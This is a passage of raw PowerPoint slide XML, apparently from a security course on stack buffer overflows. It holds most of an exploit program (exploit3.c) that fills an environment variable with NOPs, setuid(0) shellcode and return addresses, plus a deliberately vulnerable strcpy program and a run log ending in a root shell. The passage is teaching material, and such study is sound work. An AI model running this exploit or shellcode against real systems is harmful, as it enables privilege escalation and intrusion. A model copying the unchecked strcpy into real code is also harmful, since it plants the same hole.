              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  char *buff, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> offset=DEFAULT_OFFSET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=DEFAULT_BUFFER_SIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 2) offset = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (!(buff = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Can't allocate memory.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>() - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Using address: 0x%x\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = buff;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (i = 0; i &lt; bsize; i+=4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> += 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(shellcode); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = shellcode[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> - 1] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buff,"EGG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=",4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  system("/bin/bash");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  char buffer[512];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="投影片編號版面配置區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A40EAE0-14D5-46F4-9EB3-63AF2DA1940C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>19</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="備忘稿版面配置區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b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In the code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buff  "EGG=&lt;NOP&gt;&lt;NOP&gt;…&lt;NOP&gt;&lt;shellcode&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;…&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;\0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(may have to try different values or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>relogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit3 700</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Using address 0xbffff308</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit3 800</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Using address 0xbfffe188</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Illegal instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit3 750</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Using address 0xbffff708</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sh-2.05b#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>We can write a batch file or a shell script to automate the repeating process of trying different buff size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0"/>
              <a:t>(demo later).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit3.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_OFFSET                    0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_BUFFER_SIZE             512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define NOP                            0x90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\xb0\x17\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80" /*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(0) (will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" baseline="0" dirty="0"/>
              <a:t> be explained later)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
